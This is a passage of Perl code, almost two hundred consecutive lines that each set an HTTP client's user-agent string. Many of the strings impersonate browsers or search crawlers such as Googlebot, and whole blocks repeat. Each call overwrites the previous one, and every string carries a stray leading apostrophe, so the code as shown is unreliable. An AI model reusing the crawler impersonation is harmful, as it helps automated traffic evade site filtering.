  4487. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  4488. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  4489. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  4490. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  4491. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  4492. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4493. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4494. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4495. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4496. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4497. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4498. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4499. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4500. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4501. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4502. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4503. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4504. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4505. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4506. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4507. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4508. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4509. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4510. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4511. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4512. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4513. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4514. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4515. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4516. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4517. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4518. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4519. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4520. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4521. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4522. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4523. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4524. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4525. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4526. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4527. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4528. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4529. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4530. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4531. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4532. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4533. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4534. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4535. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4536. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4537. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4538. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4539. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4540. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4541. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4542. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4543. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4544. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4545. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4546. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4547. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4548. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4549. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4550. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4551. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4552. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  4553. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4554. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  4555. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  4556. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  4557. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  4558. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  4559. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  4560. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  4561. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  4562. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  4563. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4564. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  4565. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  4566. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  4567. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  4568. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  4569. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  4570. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4571. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  4572. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4573. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4574. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4575. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4576. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4577. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4578. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4579. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4580. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4581. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4582. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4583. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4584. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  4585. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  4586. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4587. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4588. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4589. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4590. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4591. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4592. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4593. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4594. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4595. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4596. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4597. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4598. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4599. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4600. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4601. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4602. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4603. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4604. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4605. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4606. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4607. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4608. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4609. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4610. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4611. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4612. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4613. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4614. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4615. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4616. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4617. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4618. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4619. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4620. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4621. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4622. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4623. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4624. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4625. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4626. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4627. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4628. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4629. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4630. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4631. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4632. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4633. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4634. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4635. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4636. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4637. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4638. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4639. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4640. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4641. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4642. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4643. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4644. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4645. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4646. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4647. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4648. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4649. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4650. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4651. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4652. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4653. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4654. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4655. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4656. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4657. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4658. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4659. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4660. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4661. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4662. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4663. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4664. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4665. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4666. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4667. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4668. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4669. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4670. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4671. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4672. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4673. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4674. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  4675. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4676. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  4677. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  4678. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
